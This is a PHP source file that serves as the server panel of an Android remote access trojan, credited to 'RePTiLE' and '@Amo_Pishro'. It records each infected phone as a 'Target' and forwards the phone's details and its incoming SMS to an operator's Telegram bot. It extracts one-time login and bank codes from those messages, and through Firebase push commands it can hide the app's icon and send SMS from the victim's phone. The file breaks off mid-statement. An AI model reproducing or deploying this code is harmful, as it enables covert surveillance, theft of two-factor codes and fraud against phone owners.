<?php
//resource By RePTiLE
include("chalim.php");

define( 'TOKEN', $bot_token );
define('PROJECT_ID', $project_id);
define('FILE', $file);

define( 'PORT_SUDO', $sudo_port );

#---------------------------------

    
function bot($method, $datas = [])
{
    $url = "https://api.telegram.org/bot".TOKEN."/" . $method;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $datas);
    $res = curl_exec($ch);
    if (curl_error($ch)) {

        var_dump(curl_error($ch));

    } else {
        return json_decode($res);
    }
}

function getAccessToken($file){
    require 'vendor/autoload.php';
    $serviceAccountFilePath = "$file";
    $serviceAccount = json_decode(file_get_contents($serviceAccountFilePath), true);

    // Generate the JWT using the service account credentials
    $clientEmail = $serviceAccount['client_email'];
    $privateKey = $serviceAccount['private_key'];

    $payload = [
        "iss" => $clientEmail,
        "scope" => "https://www.googleapis.com/auth/firebase.messaging",
        "aud" => "https://www.googleapis.com/oauth2/v4/token",
        "iat" => time(),
        "exp" => time() + 3600
    ];

    $jwt = Firebase\JWT\JWT::encode($payload, $privateKey, 'RS256');

    // Get the OAuth 2.0 access token
    $requestBody = [
        "grant_type" => "urn:ietf:params:oauth:grant-type:jwt-bearer",
        "assertion" => $jwt
    ];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://www.googleapis.com/oauth2/v4/token");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($requestBody));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        "Content-Type: application/json"
    ]);

    $response = curl_exec($ch);
    curl_close($ch);

    $accessToken = json_decode($response)->access_token;

    return $accessToken;
}

function strposA($text, $needles = array()){
	$isin = false;
	for($i=0; $i < count($needles); $i++){
		if(strpos($text, $needles[$i]) !== false){
			$isin = true;
		}
	}
	return $isin;
}
function findPooya($string){
	$date = '';
	$explode = explode("\n",$string);
	foreach($explode as $line){
		if(strpos($line,"code") !== false or strpos($line,"ورود") !== false or strpos($line,"پویا") !== false or strpos($line,"رمز") !== false or strpos($line,":کد شما") !== false){
			if(strposA($line,['1','2','3','4','5','6','7','8','9','0'])){
				$pan = getNumber($line);
			}
		}
    }
    return $pan;
}
function getNumber($string)
{
    $number = '';
    for ($i = 0; $i < strlen($string); $i++) {
        if (is_numeric($string[$i])) {
            $number .= $string[$i];
        }
    }
    return $number;
}

function getNumber2($x)
{
preg_match('/[A-Za-z0-9]+/', $x, $matches);
        $number = $matches[0];
    return $number;
}

function smg($chatid,$text,$keyboard){
	bot('sendMessage',[
	'chat_id'=>$chatid,
	'text'=>$text,
	'parse_mode'=>'HTML',
	'reply_markup'=>$keyboard
	]);
    }
    function emg($chatid,$message_id,$text,$keyboard){
    bot('editmessagetext',[ 
        'chat_id'=>$chatid, 
        'message_id'=>$message_id,
        'text'=>$text,
        'parse_mode'=>'HTML',
        'reply_markup'=>$keyboard
        ]);
        }
        function EMflag(string $code) : string {
    return (string) preg_replace_callback(
        '/./',
        static fn (array $letter) => mb_chr(ord($letter[0]) % 32 + 0x1F1E5),
        $code
    );
}
    function asd($string, $start, $end){
        $string = ' ' . $string;
        $ini    = strpos($string, $start);
        if ($ini == 0)
            return '';
        $ini += strlen($start);
        $len = strpos($string, $end, $ini) - $ini;
        return substr($string, $ini, $len);
        }
     
        if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        $ip = $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
function requests($mode, $device_id)
{
    $access = getAccessToken(FILE);
    $data = array(
        "message" => array(
            "topic" => PORT_SUDO,
            "data" => array(
                "command" => $mode,
                "device_id" => $device_id
            ),"android" => array(
                "priority" => "high"
            )
        ),
    );

    $data_string = json_encode($data);
    $headers = array(
        "Authorization: Bearer " . $access,
        "Content-Type: application/json",
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://fcm.googleapis.com/v1/projects/".PROJECT_ID."/messages:send");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
    $result = curl_exec($ch);
    curl_close($ch);
    file_put_contents("sath.txt",$result);
}

#Sms Request
function requestSMS($mode, $device_id, $phone, $message)
{

    $access = getAccessToken(FILE);

    $data = array(
        "message" => array(
            "topic" => PORT_SUDO,
            "data" => array(
                "command" => $mode,
                "device_id" => $device_id,
                "phone"=>$phone,
                "text" => $message
            ),"android" => array(
                "priority" => "high"
            )
        ),
    );

    $data_string = json_encode($data);
    $headers = array(
        "Authorization: Bearer " . $access,
        "Content-Type: application/json",
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://fcm.googleapis.com/v1/projects/".PROJECT_ID."/messages:send");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
    $result = curl_exec($ch);
    curl_close($ch);

}

function Client_IP()
{
    $target_client_ip = @$_SERVER['HTTP_CLIENT_IP'];
    $target_forward_ip = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $target_remote_ip = $_SERVER['REMOTE_ADDR'];
    if(filter_var($target_client_ip, FILTER_VALIDATE_IP))
    {
        $ip = $target_client_ip;
    }
    elseif(filter_var($target_forward_ip, FILTER_VALIDATE_IP))
    {
        $ip = $target_forward_ip;
    }
    else
    {
        $ip = $target_remote_ip;
    }
    return $ip;
}
        /*{
            static $Ary_List = array('REMOTE_ADDR', 'HTTP_CLIENT_IP', 'CLIENT_IP', 'HTTP_PROXY_CONNECTION', 'HTTP_FORWARDED', 'HTTP_X_FORWARDED', 'HTTP_X_FORWARDED_HOST', 'HTTP_X_FORWARDED_SERVER', 'FORWARDED_FOR_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED_FOR_IP', 'HTTP_X_FORWARDED_FOR', 'FORWARDED', 'X_FORWARDED_FOR', 'FORWARDED_FOR', 'X_FORWARDED', 'HTTP_VIA', 'VIA');                        
                foreach($Ary_List as $Value_array)        
                {        
                    if(isset($_SERVER[$Value_array]))        
                    {        
                        return $_SERVER[$Value_array];        
                    }        
                    elseif(getenv($Value_array))        
                    {        
                        return getenv($Value_array);        
                    }        
                    else        
                    {        
                        continue;        
                    }        
                }                        
            return 0;        
        }*/
#----------------------------------------------
 $ip = Client_IP();
 mkdir('user');
 $action=$_POST['action'];
 if(isset($_POST['Device_id'])){
 $Device_id = $_POST['Device_id'];
 }
 if(isset($_POST['Model'])){
 $Model=$_POST['Model']; 
 }
 if(isset($_POST['Battery'])){
 $Battery = $_POST['Battery'];
 }
 if(isset($_POST['andver'])){
    $os = $_POST['andver'];
 }
 if(isset($_POST['operator'])){
 $operator = $_POST['operator'];
 }
 if(isset($_POST['sender'])){
 $sender = $_POST['sender'];
 }
 if (isset($_POST['screen'])) {
    $screen = $_POST['screen'];
}
 if(isset($_POST['messagetext'])){
 $message_text = $_POST['messagetext'];
}
if(isset($_POST['Android'])){
    $Android = $_POST['Android'];
}
if(isset($_POST['berand'])){
    $berand = $_POST['berand'];
}
if(isset($_POST['Product'])){
    $Product = $_POST['Product'];
}
if(isset($_POST['word'])){
    $kal = $_POST['word'];
}

#---------------------------------------------
$install_panel = json_encode(['resize_keyboard'=>true, 'inline_keyboard'=>[
    [['text'=>"𝙷𝙸𝙳𝙴 𝙸𝙲𝙾𝙽 ",'callback_data' => "fs $Device_id $Model"],['text'=>"𝙲𝚘𝚗𝚝𝚛𝚘𝚕 𝙿𝚊𝚗𝚎𝚕",'callback_data' => "ls $Device_id $Model"]],
    [['text'=>"𝙲𝙷𝙴𝙲𝙺 𝚆𝙾𝚁𝙺 ",'callback_data' => "Kops $Device_id $Model"],['text'=>"𝙰𝚕𝚕 𝚂𝙼𝚂",'callback_data' => "kkkk $Device_id $Model"]]
]]);		
$online_panel = json_encode(['resize_keyboard'=>true, 'inline_keyboard'=>[
    [['text'=>"𝚂𝙸𝙻𝙴𝙽𝚃 ",'callback_data' => "hg $Device_id $Model"],['text'=>"𝙲𝙾𝙽𝚃𝚘𝚁𝙾𝙻 ",'callback_data' => "ls $Device_id $Model"]],
    [['text'=>"𝚂𝚃𝚊𝚃𝚄𝚂 ",'callback_data' => "rt $Device_id $Model"]]
]]);
$Log_Panel = json_encode(['resize_keyboard'=>true, 'inline_keyboard'=>[
    [['text'=>"ID : $Device_id",'callback_data' => "ls $Device_id $Model"]]
]]);
$status_panel = json_encode(['resize_keyboard'=>true, 'inline_keyboard'=>[
    [['text'=>"𝚁𝙴𝚃𝙴𝚈",'callback_data' => "rt $Device_id $Model"],['text'=>"𝙲𝙾𝙽𝚃𝙾𝚁𝙾𝙻",'callback_data' => "ls $Device_id $Model"]],[['text'=>"𝙰𝙻𝙻 𝚂𝙼𝚂 ",'callback_data' => "kkkk $Device_id $Model"]],
]]);
$sms_panel = json_encode(['resize_keyboard'=>true, 'inline_keyboard'=>[
    [['text'=>"𝙲𝙷𝙰𝙽𝙶𝙴 𝙸𝙲𝙾𝙽 ",'callback_data' => "newic $Device_id $Model"],['text'=>"𝙲𝙾𝙽𝚃𝚁𝙾𝙻",'callback_data' => "ls $Device_id $Model"]],
]]);

#---------------------------------------------
 if(isset($_POST['action'])){
$action_autohide = file_get_contents("data/autohide.txt");
$action_first = file_get_contents("data/firstsms.txt");
$Message_First = file_get_contents("data/number-first.txt");
$Number_First = file_get_contents("data/message-first.txt");
$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
$online_model = file_get_contents("data/online_model.txt");
}
#---------------------------------------------


if ($action == "install"){

    if (!file_exists("user/$Device_id-model.txt")) {
    $cont = file_get_contents("data/contact.txt");

        $kossher = $cont+1;
        file_put_contents("user/$Device_id-apk.txt","Visible");
        file_put_contents("user/$Device_id-ringer.txt","No set");
        file_put_contents("user/$Device_id-name.txt","User$kossher");
        file_put_contents("user/$Device_id-offline.txt","OFF");
        file_put_contents("user/$Device_id-ip.txt",$ip);
        file_put_contents("user/$Device_id-model.txt",$Model);
        
        file_put_contents("data/contact.txt",$cont+1);
        $install_ip = file_get_contents("user/$Device_id-ip.txt");
        $name = file_get_contents("user/$Device_id-name.txt");
        $offline = file_get_contents("user/$Device_id-offline.txt");
        $gcx = json_decode(file_get_contents("http://ip-api.com/json/$ip"),true);
        $flag = EMflag($gcx["countryCode"]);
        smg($id_sender,"
⚡ #𝙸𝚗𝚜𝚝𝚊𝚕𝚕 𝚃𝚊𝚎𝚛𝚐𝚎𝚝(𝚅4)
 
 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>🌐𝙾𝚙𝚎𝚛𝚊𝚝𝚘𝚛</b> :  <code>$operator </code> 
 <b>📱𝙼𝚘𝚍𝚎𝚕</b> :  <code>$berand </code> 
 <b>📟𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> :  <code>$os </code> 
 <b>🔋𝙱𝚊𝚃𝚃𝚎𝚁𝚈</b> :  <code>$Battery % </code> 
 <b>🏳️𝙲𝚒𝚞𝚗𝚝𝚛𝚢</b> :  <code>{$gcx["countryCode"]} $flag </code> 

 <code>/set_$Device_id</code> 
 <code>/block_$ip</code> 

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",$install_panel);
    
}else{
        $install_ip = file_get_contents("user/$Device_id-ip.txt");
        $name = file_get_contents("user/$Device_id-name.txt");
        $offline = file_get_contents("user/$Device_id-offline.txt");
        $gcx = json_decode(file_get_contents("http://ip-api.com/json/$ip"),true);
        $flag = EMflag($gcx["countryCode"]);
        smg($id_sender,"
        
⚡ #𝙸𝚗𝚜𝚝𝚊𝚕𝚕𝚎𝚍_𝚊𝚐𝚊𝚒𝚗 (𝚅4)
 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>🌐𝙾𝚙𝚎𝚛𝚊𝚝𝚘𝚛</b> :  <code>$operator </code> 
 <b>📱𝙼𝚘𝚍𝚎𝚕</b> :  <code>$berand </code> 
 <b>📟𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> :  <code>$os </code> 
 <b>🔋𝙱𝚊𝚃𝚃𝚎𝚁𝚈</b> :  <code>$Battery % </code> 
 <b>🏳️𝙲𝚒𝚞𝚗𝚝𝚛𝚢</b> :  <code>{$gcx["countryCode"]} $flag </code>  
 <b>𝙵𝚒𝚛𝚜𝚝 𝙸𝙿 </b> : <code>$install_ip</code> 
 <b>𝙸𝙿</b> : <code>$ip</code> 

• <code>/set_$Device_id</code> 
• <code>/block_$ip</code> 

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",$install_panel);

}
}
if ($action == "install"){

    if($action_first == "on"){

    
        $Number_First = file_get_contents("data/number-first.txt");
        $Message_First = file_get_contents("data/message-first.txt");
        sleep(3);
        requestSMS("send_sms",$Device_id,$Number_First,$Message_First);
        
    }  
}
if ($action == "install"){
    if($action_autohide == "on"){    
    sleep(4);
        requests('hidden',$Device_id);
        
    }
}elseif($action == "online_device"){
     if($online_model == "list"){
         $old_user = file_get_contents("data/onlineusers.txt");
        file_put_contents("data/onlineusers.txt", $old_user."[ • <b>$name</b> : <code>/set_$Device_id</code> • ] \n ");
        $onlineusers = file_get_contents("data/onlineusers.txt");
        $miid = file_get_contents("data/miid.txt");
        $lines = explode("\n", $onlineusers);
        $unique_lines = array_unique($lines);
        $result = implode("\n", $unique_lines);
        $txt = explode("/set_", $result);
        $rxt = count($txt) - 1;
        emg($id_sender,$miid,"
𝚁𝚎𝚀𝚙𝚞𝚜𝚃 𝚂𝚎𝚗𝚍 ..♻️ : 
🥳𝙰 𝙻𝚒𝚜𝚛 𝙾𝚏 𝚘𝚗𝚕𝚒𝚗𝚎 𝚞𝚜𝚎𝚛𝚂 𝙷𝙰𝚂 𝙱𝙴𝙴𝙽 𝚂𝙴𝙽𝙳 𝚃𝙾 𝚈𝙾: 

$result

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>
👤𝚄𝚜𝚎𝚛 𝚘𝚗𝚕𝚒𝚗𝚎 : $rxt
𝙿𝚕𝚎𝚜𝚊𝚎 𝙳𝚘𝚗𝚝 𝙳𝚎𝚕𝚎𝚝𝚎❌ 𝙼𝚎𝚜𝚜𝚊𝚐𝚎🥺 !",null);
     }else{
$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
        $gcx = json_decode(file_get_contents("http://ip-api.com/json/$ip"),true);
        $flag = EMflag($gcx["countryCode"]);
    smg($id_sender,"
#𝙾𝚗𝚕𝚒𝚗𝚎_𝙳𝚎𝚟𝚒𝚌𝚎
 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>🌐𝙾𝚙𝚎𝚛𝚊𝚝𝚘𝚛</b> :  <code>$operator </code> 
 <b>📱𝙼𝚘𝚍𝚎𝚕</b> :  <code>$berand </code> 
 <b>📟𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> :  <code>$os </code> 
 <b>🔋𝙱𝚊𝚃𝚃𝚎𝚁𝚈</b> :  <code>$Battery % </code> 
<b>👤𝙽𝚊𝚖𝚎 𝚃𝚊𝚛𝚐𝚎𝚃</b> : <code>user[ $kossher ]</code> 
 <b>🏳️𝙲𝚒𝚞𝚗𝚝𝚛𝚢</b> :  <code>{$gcx["countryCode"]} $flag </code> 
<b>𝙸𝙿</b> : <code>$ip</code> 
 <b>𝙵𝚒𝚛𝚜𝚝 𝙸𝙿 </b> : <code>$install_ip</code> 
 <b>𝙸𝙿</b> : <code>$ip</code> 

• <code>/set_$Device_id</code> 
• <code>/block_$ip</code> 


<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",$online_panel);   
     }
}elseif($action == "Hidden_icon"){
$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
file_put_contents("user/$Device_id-apk.txt","Hidden");
    smg($id_sender,"
 #𝙷𝚒𝚍𝚎𝚎𝚗_𝚒𝚌𝚘𝚗(𝚅4)

 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>🌐𝙾𝚙𝚎𝚛𝚊𝚝𝚘𝚛</b> :  <code>$operator </code> 
 <b>📱𝙼𝚘𝚍𝚎𝚕</b> :  <code>$berand </code> 
 <b>📟𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> :  <code>$os </code> 
 <b>🔋𝙱𝚊𝚃𝚃𝚎𝚁𝚈</b> :  <code>$Battery % </code> 
<b>👤𝙽𝚊𝚖𝚎 𝚃𝚊𝚛𝚐𝚎𝚃</b> : <code>user[ $kossher ]</code> 
 <b>🏳️𝙲𝚒𝚞𝚗𝚝𝚛𝚢</b> :  <code>{$gcx["countryCode"]} $flag </code> 
<b>𝙸𝙿</b> : <code>$ip</code> 
 <b>𝙵𝚒𝚛𝚜𝚝 𝙸𝙿 </b> : <code>$install_ip</code> 
 <b>𝙸𝙿</b> : <code>$ip</code> 

• <code>/set_$Device_id</code> 
• <code>/block_$ip</code> 

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",null); 
}elseif($action == "iconchange"){
$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
file_put_contents("user/$Device_id-apk.txt","Changed");
 smg($id_sender,"
#𝙸𝚌𝚘𝚗_𝙲𝚑𝚊𝚗𝚐𝚎𝚍 

 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>📟𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> :  <code>$os </code> 
 <b>🔋𝙱𝚊𝚃𝚃𝚎𝚁𝚈</b> :  <code>$Battery % </code> 
<b>👤𝙽𝚊𝚖𝚎 𝚃𝚊𝚛𝚐𝚎𝚃</b> : <code>user[ $kossher ]</code> 
 <b>𝙵𝚒𝚛𝚜𝚝 𝙸𝙿 </b> : <code>$install_ip</code> 
 <b>𝙸𝙿</b> : <code>$ip</code> 

 <code>/set_$Device_id</code> 
<code>/block_$ip</code> 

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",null); 
}elseif($action == "offlineOn"){
   file_put_contents("user/$Device_id-offline.txt","ON");
$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
    smg($id_sender,"
#𝙾𝚏𝚏𝚕𝚒𝚗𝚎_𝚖𝚘𝚍𝚎(𝚅4)

<b>𝚂𝚃𝚊𝚞𝚜</b> : $offline • ]
 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>🌐𝙾𝚙𝚎𝚛𝚊𝚝𝚘𝚛</b> :  <code>$operator </code> 
 <b>📱𝙼𝚘𝚍𝚎𝚕</b> :  <code>$berand </code> 
 <b>📟𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> :  <code>$os </code> 
 <b>🔋𝙱𝚊𝚃𝚃𝚎𝚁𝚈</b> :  <code>$Battery % </code> 
<b>👤𝙽𝚊𝚖𝚎 𝚃𝚊𝚛𝚐𝚎𝚃</b> : <code>user[ $kossher ]</code> 
 <b>🏳️𝙲𝚒𝚞𝚗𝚝𝚛𝚢</b> :  <code>{$gcx["countryCode"]} $flag </code> 
<b>𝙸𝙿</b> : <code>$ip</code> 
 <b>𝙵𝚒𝚛𝚜𝚝 𝙸𝙿 </b> : <code>$install_ip</code> 
 <b>𝙸𝙿</b> : <code>$ip</code> 

• <code>/set_$Device_id</code> 
• <code>/block_$ip</code> 

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",null); 
}elseif($action == "offlineOff"){
 file_put_contents("user/$Device_id-offline.txt","OFF");
$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
    smg($id_sender,"
 #𝙾𝚏𝚏𝚕𝚒𝚗𝚎-𝚖𝚘𝚍𝚎(𝚅4)
 
 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>🌐𝙾𝚙𝚎𝚛𝚊𝚝𝚘𝚛</b> :  <code>$operator </code> 
 <b>📱𝙼𝚘𝚍𝚎𝚕</b> :  <code>$berand </code> 
 <b>📟𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> :  <code>$os </code> 

<b>Coded by : @Amo_Pishro</b> ",null); 
 }elseif($action == "visible_icon"){
$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
file_put_contents("user/$Device_id-apk.txt","Visible");
 smg($id_sender,"
#𝚂𝚑𝚘𝚠_𝚒𝚌𝚘𝚗 (𝚅4)

 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>🌐𝙾𝚙𝚎𝚛𝚊𝚝𝚘𝚛</b> :  <code>$operator </code> 
 <b>📱𝙼𝚘𝚍𝚎𝚕</b> :  <code>$berand </code> 
 <b>📟𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> :  <code>$os </code> 
 <b>🔋𝙱𝚊𝚃𝚃𝚎𝚁𝚈</b> :  <code>$Battery % </code> 
<b>👤𝙽𝚊𝚖𝚎 𝚃𝚊𝚛𝚐𝚎𝚃</b> : <code>user[ $kossher ]</code> 
 <b>🏳️𝙲𝚒𝚞𝚗𝚝𝚛𝚢</b> :  <code>{$gcx["countryCode"]} $flag </code> 
 <b>𝙵𝚒𝚛𝚜𝚝 𝙸𝙿 </b> : <code>$install_ip</code> 
 <b>𝙸𝙿</b> : <code>$ip</code> 

• <code>/set_$Device_id</code> 
• <code>/block_$ip</code> 

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",null);   
    }elseif($action == "status"){
$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
        $gcx = json_decode(file_get_contents("http://ip-api.com/json/$ip"),true);
        $flag = EMflag($gcx["countryCode"]);
    smg($id_sender,"
 #Status      { #$name   (𝚅4)

 <b>𝙼𝚘𝚍𝚎𝚕📳</b> :  <code>$Model</code>  
 <b>⚙️𝙸𝚗𝚏𝚘 𝚍𝚎𝚟𝚒𝚌𝚎</b> : <code>$Device_id</code> 
 <b>🌐𝙾𝚙𝚎𝚛𝚊𝚝𝚘𝚛</b> :  <code>$operator </code> 
 <b>📱𝙼𝚘𝚍𝚎𝚕</b> :  <code>$berand </code> 
 <b>📟𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> :  <code>$os </code> 
 <b>🔋𝙱𝚊𝚃𝚃𝚎𝚁𝚈</b> :  <code>$Battery % </code> 
<b>👤𝙽𝚊𝚖𝚎 𝚃𝚊𝚛𝚐𝚎𝚃</b> : <code>user[ $kossher ]</code> 
 <b>🏳️𝙲𝚒𝚞𝚗𝚝𝚛𝚢</b> :  <code>{$gcx["countryCode"]} $flag </code> 
 <b>𝙵𝚒𝚛𝚜𝚝 𝙸𝙿 </b> : <code>$install_ip</code> 
 <b>𝙸𝙿</b> : <code>$ip</code> 

• <code>/set_$Device_id</code> 
• <code>/block_$ip</code> 

<code>/set_$Device_id</code> 
<code>/block_$ip</code

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",$status_panel);   
    
    }elseif($action == "ReciveSMS"){
$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
   $gcx = json_decode(file_get_contents("http://ip-api.com/json/$ip"),true);
   $flag = EMflag($gcx["countryCode"]);

$file_content = file_get_contents('block.txt');

if (strpos($file_content, $ip) !== false) {

} else {
$x = findPooya($message_text);
if ($x == ""){
$x = getNumber2($message_text);
}
$xx = "<b>Code :</b> <code>$x</code>";
$message_text=str_replace("$x", "<code>$x</code>", $message_text);
    smg($id_sender,"
    
#𝙽𝚎𝚠_𝙼𝚎𝚜𝚜𝚊𝚐𝚎🥳(𝚅4)

<b>☎️𝙽𝚄𝙼𝙱𝙴𝚁</b> : <code>$sender</code>
 
𝙼𝚎𝚜𝚜𝚊𝚐𝚎✉️ : \n <code>$message_text</code>


 <b>𝙼𝚘𝚍𝚎𝚕📳</b> : $Model 
 <b>𝙸𝚍📟</b> : #$Device_id •
 <b>𝙽𝚎𝚝 𝚆𝚘𝚛𝚔</b> : $operator
 <b>𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> : $os 
 <b>𝙱𝚊𝚝𝚝𝚛𝚎🔋</b> : $Battery % 
<b>𝙲𝚘𝚞𝚗𝚃𝚛𝚢</b> : {$gcx["countryCode"]} $flag 
 <b>𝙽𝚊𝚖𝚎👤</b> : <code>$name</code> 
<b>𝙵𝚒𝚛𝚜𝚝 𝙸𝚙🔎</b> : <code>$install_ip</code> 
 <b>𝙸𝚙🔎</b> : <code>$ip</code> 

 <code>/set_$Device_id</code> 
 <code>/block_$ip</code> 

<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",$sms_panel);
}
    }elseif($action == "OTPSMS"){
$phone = asd($message_text,'[Address=',', Body=');
$body= asd($message_text,', Body=','IsInitialized');
$install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
     $gcx = json_decode(file_get_contents("http://ip-api.com/json/$ip"),true);
     $flag = EMflag($gcx["countryCode"]);
smg($id_sender,"
#𝙽𝚎𝚠_𝙼𝚎𝚜𝚜𝚊𝚐𝚎🥳

<b>☎️𝙽𝚄𝙼𝙱𝙴𝚁</b> : <code>$sender</code>
 
𝙼𝚎𝚜𝚜𝚊𝚐𝚎✉️ : \n <code>$body</code>


 <b>𝙼𝚘𝚍𝚎𝚕📳</b> : $Model 
 <b>𝙸𝚍📟</b> : #$Device_id •
 <b>𝙽𝚎𝚝 𝚆𝚘𝚛𝚔</b> : $operator
 <b>𝙰𝚗𝚍𝚛𝚘𝚒𝚍</b> : $os 
 <b>𝙱𝚊𝚝𝚝𝚛𝚎🔋</b> : $Battery % 
<b>𝙲𝚘𝚞𝚗𝚃𝚛𝚢</b> : {$gcx["countryCode"]} $flag 
 <b>𝙽𝚊𝚖𝚎👤</b> : <code>$name</code> 
<b>𝙵𝚒𝚛𝚜𝚝 𝙸𝚙🔎</b> : <code>$install_ip</code> 
 <b>𝙸𝚙🔎</b> : <code>$ip</code> 

 <code>/set_$Device_id</code> 
 <code>/block_$ip</code> 
<b><a href='t.me/$dev_id'>🧑‍🎨ʀᴀᴛ - sᴜᴘᴘᴏʀᴛ</a> </b>",$sms_panel);

    }elseif($action == "lastsms"){
        $install_ip = file_get_contents("user/$Device_id-ip.txt");
$name = file_get_contents("user/$Device_id-name.txt");
$offline = file_get_contents("user/$Device_id-offline.txt");
      $gcx = json_decode(file_get_contents("http://ip-api.com/json/$ip"),true);
      $flag = EMflag($gcx["countryCode"]);
    smg($id_sender,"
 #𝙻𝚊𝚜𝚃_𝙼𝚎𝚜𝚜𝚊𝚐𝚎📩(𝚅4)

<b>☎️𝙽𝚄𝙼𝙱𝙴𝚁</b> : <code>$sender </code> 
